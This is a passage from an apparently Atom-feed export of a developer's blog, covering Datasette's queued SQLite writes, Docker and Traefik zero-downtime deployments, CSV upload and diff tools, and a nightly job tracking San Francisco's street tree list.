&lt;p&gt;There's just one big problem: SQLite may be great at fast, reliable writes but it still doesn't like concurrent writes: it's important to only ever have one connection writing to a SQLite database at a time.&lt;/p&gt;

&lt;p&gt;I've been mulling over the best way to handle this for &lt;a href="https://github.com/simonw/datasette/issues/567"&gt;the best part of a year&lt;/a&gt;... and then a couple of days ago I had a breakthrough: with a dedicated write thread for a database file, I could use a Python queue to ensure only one write could access the database at a time.&lt;/p&gt;

&lt;p&gt;There's prior art for this: SQLite wizard Charles Leifer &lt;a href="https://charlesleifer.com/blog/multi-threaded-sqlite-without-the-operationalerrors/"&gt;released code plus a beautiful explanation&lt;/a&gt; of how to queue writes to SQLite back in 2017. I'm not sure why I didn't settle on his approach sooner.&lt;/p&gt;
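&lt;p&gt;The pattern itself is compact - here's a minimal sketch (not Datasette's actual implementation), with a single writer thread that owns the only write connection and pulls work off a queue:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;import queue
import sqlite3
import threading

write_queue = queue.Queue()

def writer(db_path):
    # The one and only write connection lives - and stays - in this thread
    conn = sqlite3.connect(db_path)
    while True:
        fn, reply = write_queue.get()
        try:
            reply.put(fn(conn))
        except Exception as exc:
            reply.put(exc)

def execute_write_fn(fn):
    # Queue a function that takes the write connection; block for its result
    reply = queue.Queue()
    write_queue.put((fn, reply))
    result = reply.get()
    if isinstance(result, Exception):
        raise result
    return result

threading.Thread(target=writer, args=("data.db",), daemon=True).start()

def create_logs(conn):
    with conn:  # commits on success
        conn.execute("create table if not exists logs (message text)")

execute_write_fn(create_logs)
&lt;/code&gt;&lt;/pre&gt;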

&lt;p&gt;So... &lt;a href="https://datasette.readthedocs.io/en/stable/changelog.html#v0-37"&gt;Datasette 0.37&lt;/a&gt;, released this evening, has a new capability exposed to plugins: they can now request that an operation (either a SQL statement or a full custom Python function) be &lt;a href="https://github.com/simonw/datasette/issues/682"&gt;queued up to execute inside a thread&lt;/a&gt; that possesses an exclusive write connection to a SQLite database.&lt;/p&gt;

&lt;p&gt;I've documented how plugins can use this in the new plugin internals documentation: &lt;a href="https://datasette.readthedocs.io/en/latest/internals.html#database-class"&gt;execute_write() and execute_write_fn()&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;So far there's only one public plugin that takes advantage of this: &lt;a href="https://github.com/simonw/datasette-upload-csvs"&gt;datasette-upload-csvs&lt;/a&gt;, which previously used &lt;a href="https://github.com/simonw/datasette-upload-csvs/blob/699e6ca591f36264bfc8e590d877e6852f274beb/datasette_upload_csvs/app.py#L43-L46"&gt;a dirty hack&lt;/a&gt; but has now been upgraded to use the new &lt;code&gt;execute_write_fn()&lt;/code&gt; method.&lt;/p&gt;

&lt;p&gt;I'm really excited about the potential plugins this unlocks, though. I experimented with a logging plugin and a plugin for deleting tables while I was building the hooks (full implementations of those are posted as comments in &lt;a href="https://github.com/simonw/datasette/pull/683"&gt;the pull request&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;Other use-cases I'm interested to explore include:&lt;/p&gt;

&lt;ul&gt;&lt;li&gt;Plugins that import data from other APIs or services. Imagine web UIs for some of my &lt;a href="https://github.com/dogsheep"&gt;Dogsheep tools&lt;/a&gt; for example.&lt;/li&gt;&lt;li&gt;Plugins that periodically update data - pulling the latest CSV updates from government open data portals (like &lt;a href="https://simonwillison.net/2019/Mar/13/tree-history/"&gt;San Francisco's trees&lt;/a&gt;).&lt;/li&gt;&lt;li&gt;Tools for enhancing tables with additional data derived from their values - geocoding or reverse geocoding columns, resolving identifiers and so on.&lt;/li&gt;&lt;li&gt;Now that plugins have a tool for maintaining their own state, they could use SQLite tables to track things like which saved searches have been executed.&lt;/li&gt;&lt;li&gt;A plugin that lets you attach annotations to rows and columns in other tables, storing those annotations in its own SQLite database.&lt;/li&gt;&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/plugins"&gt;plugins&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/threads"&gt;threads&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="plugins"/><category term="sqlite"/><category term="threads"/><category term="datasette"/><category term="weeknotes"/></entry><entry><title>Weeknotes: Datasette Cloud and zero downtime deployments</title><link href="https://simonwillison.net/2020/Jan/21/weeknotes-datasette-cloud-and-zero-downtime-deployments/#atom-tag" rel="alternate"/><published>2020-01-21T20:56:46+00:00</published><updated>2020-01-21T20:56:46+00:00</updated><id>https://simonwillison.net/2020/Jan/21/weeknotes-datasette-cloud-and-zero-downtime-deployments/#atom-tag</id><summary type="html">
    &lt;p&gt;Yesterday's piece on &lt;a href="https://simonwillison.net/2020/Jan/21/github-actions-cloud-run/"&gt;Tracking FARA by deploying a data API using GitHub Actions and Cloud Run&lt;/a&gt; was originally intended to be my weeknotes, but ended up getting a bit too involved.&lt;/p&gt;

&lt;p&gt;Aside from playing with GitHub Actions and Cloud Run, my focus over the past week has been working on Datasette Cloud. Datasette Cloud is the current name I'm using for my hosted &lt;a href="https://datasette.readthedocs.io/"&gt;Datasette&lt;/a&gt; product - the idea being that I'll find it &lt;em&gt;a lot&lt;/em&gt; easier to get &lt;a href="https://simonwillison.net/2019/Sep/10/jsk-fellowship/"&gt;feedback on Datasette from journalists&lt;/a&gt; if they can use it without having to install anything!&lt;/p&gt;

&lt;p&gt;My MVP for Datasette Cloud is that I can use it to instantly provision a new, private Datasette instance for a journalist (or team of journalists) that they can then sign into, start playing with and upload their data to (initially as CSV files).&lt;/p&gt;

&lt;p&gt;I have to solve quite a few problems to get there:&lt;/p&gt;

&lt;ul&gt;&lt;li&gt;Secure, isolated instances of Datasette. A team or user should only be able to see their own files. I plan to solve this using Docker containers that are mounted such that they can only see their own dedicated volumes.&lt;/li&gt;&lt;li&gt;The ability to provision new instances as easily as possible - and give each one its own HTTPS subdomain.&lt;/li&gt;&lt;li&gt;Authentication: users need to be able to register and sign in to accounts. I could use &lt;a href="https://github.com/simonw/datasette-auth-github"&gt;datasette-auth-github&lt;/a&gt; for this but I'd like to be able to support regular email/password accounts too.&lt;/li&gt;&lt;li&gt;Users need to be able to upload CSV files and have them converted into a SQLite database compatible with Datasette.&lt;/li&gt;&lt;/ul&gt;

&lt;h3&gt;Zero downtime deployments&lt;/h3&gt;

&lt;p&gt;I have a stretch goal which I'm taking pretty seriously: I want to have a mechanism in place for zero-downtime deployments of new versions of the software.&lt;/p&gt;

&lt;p&gt;Arguably this is an unnecessary complication for an MVP. I may not fully implement it, but I do want to at least know that the path I've taken is compatible with zero downtime deployments.&lt;/p&gt;

&lt;p&gt;Why do zero downtime deployments matter so much to me? Because they are desirable for rapid iteration, and crucial for setting up continuous deployment. Even a couple of seconds of downtime during a deployment creates a psychological pressure not to deploy too often. I've seen the productivity boost that deploying fearlessly multiple times a day brings, and I want it.&lt;/p&gt;

&lt;p&gt;So I've been doing a bunch of research into zero downtime deployment options (thanks to some &lt;a href="https://twitter.com/simonw/status/1217599189921628160"&gt;great help on Twitter&lt;/a&gt;) and I think I have something that's going to work for me.&lt;/p&gt;

&lt;p&gt;The first ingredient is &lt;a href="https://docs.traefik.io/"&gt;Traefik&lt;/a&gt; - a new-to-me edge router (similar to nginx) which has a delightful focus on runtime configuration based on automatic discovery.&lt;/p&gt;

&lt;p&gt;It works with a bunch of different technology stacks, but I'm going to be using it with regular Docker. Traefik watches for new Docker containers, reads their labels and uses that to reroute traffic to them.&lt;/p&gt;

&lt;p&gt;So I can launch a new Docker container, apply the Docker label &lt;code&gt;"traefik.frontend.rule": "Host:subdomain.mydomain.com"&lt;/code&gt; and Traefik will start proxying traffic to that subdomain directly to that container.&lt;/p&gt;

&lt;p&gt;Traefik also has extremely robust built-in support for Let's Encrypt to issue certificates. I managed to &lt;a href="https://docs.traefik.io/https/acme/#wildcard-domains"&gt;issue a wildcard TLS certificate&lt;/a&gt; for my entire domain, so new subdomains are encrypted straight away. This did require me to give Traefik API access to modify DNS entries - I'm running DNS for this project on Digital Ocean and thankfully Traefik knows how to do this by talking to their API.&lt;/p&gt;

&lt;p&gt;That solves provisioning: when I create a new account I can call the Docker API (from Python) to start up a new, labelled container on a subdomain protected by a TLS certificate.&lt;/p&gt;
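
&lt;p&gt;As a sketch using the Docker SDK for Python - the image name, volume path and domain here are placeholders, and the label uses the Traefik 1.x syntax shown above:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;import docker

client = docker.from_env()

def provision_instance(subdomain):
    # Start a labelled container; Traefik spots the label and begins
    # routing traffic for that subdomain to it
    return client.containers.run(
        'datasette-image:latest',  # placeholder image name
        detach=True,
        labels={
            'traefik.frontend.rule': 'Host:%s.mydomain.com' % subdomain,
        },
        volumes={
            '/srv/instances/%s' % subdomain: {'bind': '/data', 'mode': 'rw'},
        },
    )
&lt;/code&gt;&lt;/pre&gt;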

&lt;p&gt;I still needed a way to run a zero-downtime deployment of a new container (for example when I release a new version of Datasette and want to upgrade everyone). After quite a bit of research (during which I discovered you can't modify the labels on a Docker container without restarting it) I settled on the approach described in &lt;a href="https://coderbook.com/@marcus/how-to-do-zero-downtime-deployments-of-docker-containers/"&gt;this article&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Essentially you configure Traefik to retry failed requests, start a new, updated container with the same routing information as the existing one (causing Traefik to load balance HTTP requests across both), then shut down the old container and trust Traefik to retry in-flight requests against the one that's still running.&lt;/p&gt;
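
&lt;p&gt;Here's that sequence sketched with the Docker SDK for Python - the function name is mine, and real code would poll a health check rather than sleeping:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;import time
import docker

client = docker.from_env()

def rolling_deploy(old_container_id, image, labels):
    # 1. Start the replacement with identical routing labels, so
    #    Traefik load balances across the old and new containers
    new = client.containers.run(image, detach=True, labels=labels)
    # 2. Give the new container time to start serving (a real
    #    deployment would poll a health check endpoint instead)
    time.sleep(5)
    # 3. Stop and remove the old container; Traefik retries any
    #    in-flight requests against the replacement
    old = client.containers.get(old_container_id)
    old.stop()
    old.remove()
    return new
&lt;/code&gt;&lt;/pre&gt;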

&lt;p&gt;Rudimentary testing with &lt;code&gt;ab&lt;/code&gt; suggested that this is working as desired.&lt;/p&gt;

&lt;p&gt;One remaining problem: if Traefik is running in a Docker container and proxying all of my traffic, how can I upgrade Traefik itself without any downtime?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://twitter.com/simonw/status/1218604019033100288"&gt;Consensus on Twitter&lt;/a&gt; seems to be that Docker on its own doesn't have a great mechanism for this (I was hoping I could re-route port 80 traffic to the host to a different container in an atomic way). But... &lt;code&gt;iptables&lt;/code&gt; has mechanisms that can re-route traffic from one port to another - so I should be able to run a new Traefik container on a different port and re-route to it at the operating system level.&lt;/p&gt;

&lt;p&gt;That's quite enough yak shaving around zero-downtime deployments for now!&lt;/p&gt;

&lt;h3 id="datasette-upload-csvs"&gt;datasette-upload-csvs&lt;/h3&gt;

&lt;p&gt;A big problem I'm seeing with the current Datasette ecosystem is that while Datasette offers a web-based user interface for querying and accessing data, the &lt;a href="https://datasette.readthedocs.io/en/0.33/ecosystem.html#tools-for-creating-sqlite-databases"&gt;tools I've written for actually creating those databases&lt;/a&gt; are decidedly command-line only.&lt;/p&gt;

&lt;p&gt;Telling journalists they have to learn to install and run software on the command-line is way too high a barrier to entry.&lt;/p&gt;

&lt;p&gt;I've always intended to have Datasette plugins that can handle uploading and converting data. It's time to actually build one!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/simonw/datasette-upload-csvs"&gt;datasette-upload-csvs&lt;/a&gt; is what I've got so far. It has a big warning not to use it in the README - it's &lt;em&gt;very&lt;/em&gt; alpha sofware at the moment - but it does prove that the concept can work.&lt;/p&gt;

&lt;p&gt;It uses the &lt;a href="https://datasette.readthedocs.io/en/stable/plugins.html#asgi-wrapper-datasette"&gt;asgi_wrapper&lt;/a&gt; plugin hook to intercept requests to the path &lt;code&gt;/-/upload-csv&lt;/code&gt; and forward them on to another ASGI app, written using Starlette, which provides a basic upload form and then handles the upload.&lt;/p&gt;
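
&lt;p&gt;The interception pattern looks roughly like this (heavily simplified - &lt;code&gt;upload_app&lt;/code&gt; stands in for the Starlette application):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;from datasette import hookimpl

@hookimpl
def asgi_wrapper(datasette):
    def wrap(app):
        async def wrapped(scope, receive, send):
            if scope['type'] == 'http' and scope['path'] == '/-/upload-csv':
                # Hand the request to the Starlette upload application
                await upload_app(scope, receive, send)
            else:
                # Everything else passes through to Datasette as normal
                await app(scope, receive, send)
        return wrapped
    return wrap
&lt;/code&gt;&lt;/pre&gt;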

&lt;p&gt;Uploaded CSVs are converted to SQLite using &lt;a href="https://sqlite-utils.readthedocs.io/"&gt;sqlite-utils&lt;/a&gt; and written to the first mutable database attached to Datasette.&lt;/p&gt;
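
&lt;p&gt;The core of that conversion is pleasantly small. A sketch of the idea (the helper name is mine):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;import csv
import io
import sqlite_utils

def load_csv_bytes(db_path, table, csv_bytes):
    # Parse the uploaded bytes, then write the rows to a table -
    # sqlite-utils creates it, inferring columns from the first row
    rows = csv.DictReader(io.StringIO(csv_bytes.decode('utf-8')))
    sqlite_utils.Database(db_path)[table].insert_all(rows)
&lt;/code&gt;&lt;/pre&gt;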

&lt;p&gt;It needs a bunch more work (and tests) before I'm comfortable telling people to use it, but it does at least exist as a proof of concept for me to iterate on.&lt;/p&gt;

&lt;h3&gt;datasette-auth-django-cookies&lt;/h3&gt;

&lt;p&gt;No code for this yet, but I'm beginning to flesh it out as a concept.&lt;/p&gt;

&lt;p&gt;I don't particularly want to implement user registration and authentication and cookies and password hashing. I know how to do it, which means I know it's not something you should re-roll for every project.&lt;/p&gt;

&lt;p&gt;Django has a really well designed, robust authentication system. Can't I just use that?&lt;/p&gt;

&lt;p&gt;Since all of my applications will be running on subdomains of a single domain, my current plan is to have a regular Django application which handles registration and logins. Each subdomain will then run a custom piece of Datasette ASGI middleware which knows how to read and validate the Django authentication cookie.&lt;/p&gt;

&lt;p&gt;This should give me single sign-on with a single, audited codebase for registration and login with (hopefully) the least amount of work needed to integrate it with Datasette.&lt;/p&gt;

&lt;p&gt;Code for this will hopefully follow over the next week.&lt;/p&gt;

&lt;h3&gt;Niche Museums - now publishing weekly&lt;/h3&gt;

&lt;p&gt;I hit a milestone with my &lt;a href="https://www.niche-museums.com/"&gt;Niche Museums&lt;/a&gt; project: the site now lists details of 100 museums!&lt;/p&gt;

&lt;p&gt;For the 100th entry I decided to celebrate with by far the most rewarding (and exclusive) niche museum experience I've ever had: &lt;a href="https://www.niche-museums.com/browse/museums/100"&gt;Ray Bandar's Bone Palace&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;You should read the entry. The short version is that Ray Bandar collected 7,000 animal skulls over a sixty-year period, and Natalie managed to score us a tour of his incredible basement mere weeks before the collection was donated to the California Academy of Sciences.&lt;/p&gt;

&lt;img src="https://niche-museums.imgix.net/ray-bandar.jpeg?w=1600&amp;amp;h=800&amp;amp;fit=crop&amp;amp;auto=compress" alt="The basement full of skulls" style="max-width: 100%" /&gt;

&lt;p&gt;Posting one museum a day was taking up more and more of my time, as I had to delve into the depths of my museums-I-have-visited backlog and do increasing amounts of research. Now that I've hit 100 I'm going to switch to publishing one a week, which should also help me visit new ones quickly enough to keep the backlog full!&lt;/p&gt;

&lt;p&gt;So I only posted four this week:&lt;/p&gt;

&lt;ul&gt;&lt;li&gt;&lt;a href="https://www.niche-museums.com/browse/museums/97"&gt;The ruins of Llano del Rio&lt;/a&gt; in Los Angeles County&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.niche-museums.com/browse/museums/98"&gt;Cleveland Hungarian Museum&lt;/a&gt; in Cleveland&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.niche-museums.com/browse/museums/99"&gt;New Orleans Historic Voodoo Museum&lt;/a&gt; in New Orleans&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.niche-museums.com/browse/museums/100"&gt;Ray Bandar's Bone Palace&lt;/a&gt; in San Francisco&lt;/li&gt;&lt;/ul&gt;

&lt;p&gt;I also &lt;a href="https://github.com/simonw/museums/commits/842dfb96"&gt;built a simple JavaScript image gallery&lt;/a&gt; to better display the 54 photos I published from our trip to Ray Bandar's basement.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/deployment"&gt;deployment&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/museums"&gt;museums&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/zero-downtime"&gt;zero-downtime&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/docker"&gt;docker&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/traefik"&gt;traefik&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette-cloud"&gt;datasette-cloud&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/digitalocean"&gt;digitalocean&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="deployment"/><category term="museums"/><category term="projects"/><category term="zero-downtime"/><category term="docker"/><category term="datasette"/><category term="weeknotes"/><category term="traefik"/><category term="datasette-cloud"/><category term="digitalocean"/></entry><entry><title>Dockerfile for creating a Datasette of NHS dentist information</title><link href="https://simonwillison.net/2019/Apr/26/dockerfile-datasette-dentists/#atom-tag" rel="alternate"/><published>2019-04-26T14:09:34+00:00</published><updated>2019-04-26T14:09:34+00:00</updated><id>https://simonwillison.net/2019/Apr/26/dockerfile-datasette-dentists/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/hubgit/datasette-dentists/blob/master/Dockerfile"&gt;Dockerfile for creating a Datasette of NHS dentist information&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Really neat Dockerfile example by Alf Eaton that uses multi-stage builds to pull dentist information from the NHS, compile to SQLite using csvs-to-sqlite and serve the results with Datasette. TIL the NHS like to use ¬ as their CSV separator!

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/invisiblecomma/status/1121768361648635904"&gt;@invisiblecomma&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/alf-eaton"&gt;alf-eaton&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/docker"&gt;docker&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="alf-eaton"/><category term="csv"/><category term="docker"/><category term="datasette"/></entry><entry><title>tsv-utils</title><link href="https://simonwillison.net/2019/Apr/7/tsv-utils/#atom-tag" rel="alternate"/><published>2019-04-07T20:29:38+00:00</published><updated>2019-04-07T20:29:38+00:00</updated><id>https://simonwillison.net/2019/Apr/7/tsv-utils/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/eBay/tsv-utils"&gt;tsv-utils&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Powerful collection of CLI tools for processing TSV files, written in D for performance and released by eBay. Includes a csv2tsv conversion tool. You can download an archive of pre-built binaries for Linux and OS X from their releases page: worked fine on my Mac.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/jeffsonstein/status/1114985044144271360"&gt;@jeffsonstein&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/cli"&gt;cli&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;&lt;/p&gt;



</summary><category term="cli"/><category term="csv"/></entry><entry><title>csv-diff 0.3.1</title><link href="https://simonwillison.net/2019/Apr/7/csv-diff/#atom-tag" rel="alternate"/><published>2019-04-07T20:03:20+00:00</published><updated>2019-04-07T20:03:20+00:00</updated><id>https://simonwillison.net/2019/Apr/7/csv-diff/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/simonw/csv-diff/releases/tag/0.3.1"&gt;csv-diff 0.3.1&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I released a minor update to my csv-diff CLI tool today which does a better job of displaying a human-readable representation of rows that have been added or removed from a file—previously they were represented as an ugly JSON dump. My script monitoring changes to the official list of trees in San Francisco has been running for a month now and has captured 23 commits!

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/simonw/status/1114979445343842304"&gt;@simonw&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/cli"&gt;cli&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/diff"&gt;diff&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;&lt;/p&gt;



</summary><category term="cli"/><category term="csv"/><category term="diff"/><category term="projects"/></entry><entry><title>VisiData</title><link href="https://simonwillison.net/2019/Mar/18/visidata/#atom-tag" rel="alternate"/><published>2019-03-18T03:45:16+00:00</published><updated>2019-03-18T03:45:16+00:00</updated><id>https://simonwillison.net/2019/Mar/18/visidata/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://visidata.org/"&gt;VisiData&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Intriguing tool by Saul Pwanson: VisiData is a command-line "textpunk utility" for browsing and manipulating tabular data. &lt;code&gt;pip3 install visidata&lt;/code&gt; and then &lt;code&gt;vd myfile.csv&lt;/code&gt; (or &lt;code&gt;.json&lt;/code&gt; or &lt;code&gt;.xls&lt;/code&gt; or SQLite or others) and get an interactive terminal UI for quickly searching through the data, conducting frequency analysis of columns, manipulating it and much more besides. Two tips for if you start playing with it: hit &lt;code&gt;gq&lt;/code&gt; to exit, and hit &lt;code&gt;Ctrl+H&lt;/code&gt; to view the help screen.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/saulfp/status/1107484382313340929"&gt;@saulfp&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/data-journalism"&gt;data-journalism&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="data-journalism"/><category term="python"/><category term="sqlite"/></entry><entry><title>Generating a commit log for San Francisco's official list of trees</title><link href="https://simonwillison.net/2019/Mar/13/tree-history/#atom-tag" rel="alternate"/><published>2019-03-13T14:49:48+00:00</published><updated>2019-03-13T14:49:48+00:00</updated><id>https://simonwillison.net/2019/Mar/13/tree-history/#atom-tag</id><summary type="html">
    &lt;p&gt;San Francisco has a &lt;a href="https://datasf.org/"&gt;neat open data portal&lt;/a&gt; (as do an &lt;a href="https://opendatainception.io/"&gt;increasingly large number&lt;/a&gt; of cities these days). For a few years my favourite file on there has been &lt;a href="https://data.sfgov.org/City-Infrastructure/Street-Tree-List/tkzw-k3nq"&gt;Street Tree List&lt;/a&gt;, a list of all 190,000 trees in the city maintained by the Department of Public Works.&lt;/p&gt;
&lt;p&gt;I’ve been using that file for Datasette demos &lt;a href="https://simonwillison.net/2017/Nov/25/new-in-datasette/"&gt;for a while now&lt;/a&gt;, but last week I noticed something intriguing: the file had been recently updated. On closer inspection it turns out it’s updated on a regular basis! I had assumed it was a static snapshot of trees at a certain point in time, but I was wrong: &lt;code&gt;Street_Tree_List.csv&lt;/code&gt; is a living document.&lt;/p&gt;
&lt;p&gt;Back in September 2017 I built a &lt;a href="https://simonwillison.net/2017/Sep/10/scraping-irma/"&gt;scraping project relating to hurricane Irma&lt;/a&gt;. The idea was to take data sources like FEMA’s list of open shelters and track them over time, by scraping them into a git repository and committing after every fetch.&lt;/p&gt;
&lt;p&gt;I’ve been meaning to spend more time with this idea, and building a commit log for San Francisco’s trees looked like an ideal opportunity to do so.&lt;/p&gt;
&lt;h3&gt;&lt;a id="sftreehistory_8"&gt;&lt;/a&gt;sf-tree-history&lt;/h3&gt;
&lt;p&gt;Here’s the result: &lt;a href="https://github.com/simonw/sf-tree-history"&gt;sf-tree-history&lt;/a&gt;, a git repository dedicated to recording the history of changes made to the official list of San Francisco’s trees. The repo contains three things: the latest copy of &lt;code&gt;Street_Tree_List.csv&lt;/code&gt;, a &lt;code&gt;README&lt;/code&gt;, and a &lt;a href="https://github.com/simonw/sf-tree-history/blob/master/.circleci/config.yml"&gt;Circle CI configuration&lt;/a&gt; that grabs a new copy of the file every night and, if it has changed, commits it to git and pushes the result to GitHub.&lt;/p&gt;
&lt;p&gt;The most interesting part of the repo is the &lt;a href="https://github.com/simonw/sf-tree-history/commits/master"&gt;commit history&lt;/a&gt; itself. I’ve only been running the script for just over a week, but I already have some useful illustrative commits:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/sf-tree-history/commit/7ab432cdcb8d7914cfea4a5b59803f38cade532b"&gt;7ab432cdcb8d7914cfea4a5b59803f38cade532b&lt;/a&gt; from March 6th records three new trees added to the file: two Monterey Pines and a Blackwood Acacia.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/sf-tree-history/commit/d6b258959af9546909b2eee836f0156ed88cd45d"&gt;d6b258959af9546909b2eee836f0156ed88cd45d&lt;/a&gt; from March 12th shows four changes made to existing records. Of particular interest: TreeID 235981 (a Cherry Plum) had its address updated from 412 Webster St to 410 Webster St and its latitude and longitude tweaked a little bit as well.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/sf-tree-history/commit/ca66d9a5fdd632549301d249c487004a5b68abf2"&gt;ca66d9a5fdd632549301d249c487004a5b68abf2&lt;/a&gt; lists 2151 rows changed, 1280 rows added! I found an old copy of &lt;code&gt;Street_Tree_List.csv&lt;/code&gt; on my laptop from April 2018, so for fun I loaded it into the repository and used &lt;code&gt;git commit amend&lt;/code&gt; to back-date the commit to almost a year ago. I generated a commit message between that file and the version from 9 days ago which came in at around 10,000 lines of text. Git handled that just fine, but GitHub’s web view &lt;a href="https://github.com/simonw/sf-tree-history/commit/ca66d9a5fdd632549301d249c487004a5b68abf2"&gt;sadly truncates it&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;a id="csvdiff_18"&gt;&lt;/a&gt;csv-diff&lt;/h3&gt;
&lt;p&gt;One of the things I learned from my hurricane Irma project was the importance of human-readable commit messages that summarize the detected changes. I initially wrote some code to generate those by hand, but then realized that this could be extracted into a reusable tool.&lt;/p&gt;
&lt;p&gt;The result is &lt;a href="https://github.com/simonw/csv-diff"&gt;csv-diff&lt;/a&gt;, a tiny Python CLI tool which can generate a human (or machine) readable version of the differences between two CSV files.&lt;/p&gt;
&lt;p&gt;Using it looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ csv-diff one.csv two.csv --key=id
1 row added, 1 row removed, 1 row changed

1 row added

  {&amp;quot;id&amp;quot;: &amp;quot;3&amp;quot;, &amp;quot;name&amp;quot;: &amp;quot;Bailey&amp;quot;, &amp;quot;age&amp;quot;: &amp;quot;1&amp;quot;}

1 row removed

  {&amp;quot;id&amp;quot;: &amp;quot;2&amp;quot;, &amp;quot;name&amp;quot;: &amp;quot;Pancakes&amp;quot;, &amp;quot;age&amp;quot;: &amp;quot;2&amp;quot;}

1 row changed

  Row 1
    age: &amp;quot;4&amp;quot; =&amp;gt; &amp;quot;5&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;a href="https://github.com/simonw/csv-diff/blob/master/README.md"&gt;csv-diff README&lt;/a&gt; has further details on the tool.&lt;/p&gt;
&lt;h3&gt;&lt;a id="Circle_CI_44"&gt;&lt;/a&gt;Circle CI&lt;/h3&gt;
&lt;p&gt;My favourite thing about the &lt;code&gt;sf-tree-history&lt;/code&gt; project is that it costs me nothing to run - either in hosting costs or (hopefully) in terms of ongoing maintenance.&lt;/p&gt;
&lt;p&gt;The git repository is hosted for free on GitHub. Because it’s a public project, &lt;a href="https://circleci.com/"&gt;Circle CI&lt;/a&gt; will run tasks against it for free.&lt;/p&gt;
&lt;p&gt;My &lt;a href="https://github.com/simonw/sf-tree-history/blob/master/.circleci/config.yml"&gt;.circleci/config.yml&lt;/a&gt; does the rest. It uses Circle’s &lt;a href="https://circleci.com/docs/2.0/workflows/#scheduling-a-workflow"&gt;cron syntax&lt;/a&gt; to schedule a task that runs every night. The task then runs this script (embedded in the YAML configuration):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cp Street_Tree_List.csv Street_Tree_List-old.csv
curl -o Street_Tree_List.csv &amp;quot;https://data.sfgov.org/api/views/tkzw-k3nq/rows.csv?accessType=DOWNLOAD&amp;quot;
